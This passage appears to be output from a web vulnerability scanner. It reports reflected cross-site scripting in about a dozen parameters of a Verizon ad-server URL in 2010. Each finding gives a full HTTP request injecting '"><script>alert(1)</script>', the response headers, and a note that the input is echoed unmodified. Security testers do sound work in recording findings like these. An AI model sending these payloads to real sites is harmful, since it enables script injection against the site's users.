GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=14c09"><script>alert(1)</script>9bf55b7778c&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd800"><script>alert(1)</script>1fbf2886a4d was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=dd800"><script>alert(1)</script>1fbf2886a4d&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd4b8"><script>alert(1)</script>f43c1bd4bbd was submitted in the partner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=bd4b8"><script>alert(1)</script>f43c1bd4bbd&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770a4"><script>alert(1)</script>1e832059d7 was submitted in the popcity parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=770a4"><script>alert(1)</script>1e832059d7&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:12:54 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1392 Content-Type: text/html Cache-Control: private Content-Length: 1392
The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7caf7"><script>alert(1)</script>50a54869684 was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=7caf7"><script>alert(1)</script>50a54869684&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1da7f"><script>alert(1)</script>dd21dfded12 was submitted in the popdma parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=1da7f"><script>alert(1)</script>dd21dfded12&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d09c"><script>alert(1)</script>fd46850320a was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=1d09c"><script>alert(1)</script>fd46850320a&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:12:51 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7047a"><script>alert(1)</script>d1e5424609b was submitted in the popip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.2187047a"><script>alert(1)</script>d1e5424609b&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:12:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b4c"><script>alert(1)</script>f168f1782af was submitted in the popservice parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=46b4c"><script>alert(1)</script>f168f1782af&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:05 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67eb7"><script>alert(1)</script>25f6305b55d was submitted in the popstate parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=67eb7"><script>alert(1)</script>25f6305b55d&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:12:57 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9011"><script>alert(1)</script>883683fd3b3 was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=a9011"><script>alert(1)</script>883683fd3b3&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:12:59 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69473"><script>alert(1)</script>59a6c993841 was submitted in the prizm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=69473"><script>alert(1)</script>59a6c993841&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:10 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bff5"><script>alert(1)</script>2291f6d753d was submitted in the pts parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=9bff5"><script>alert(1)</script>2291f6d753d&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c02f"><script>alert(1)</script>7422fc85b1a was submitted in the pws parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=2c02f"><script>alert(1)</script>7422fc85b1a&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4daa"><script>alert(1)</script>d5404341735 was submitted in the search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=e4daa"><script>alert(1)</script>d5404341735 HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:05 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 577c7"><script>alert(1)</script>7bd9773acc was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=577c7"><script>alert(1)</script>7bd9773acc&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:53 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec203"><script>alert(1)</script>f54ed3ebb44 was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
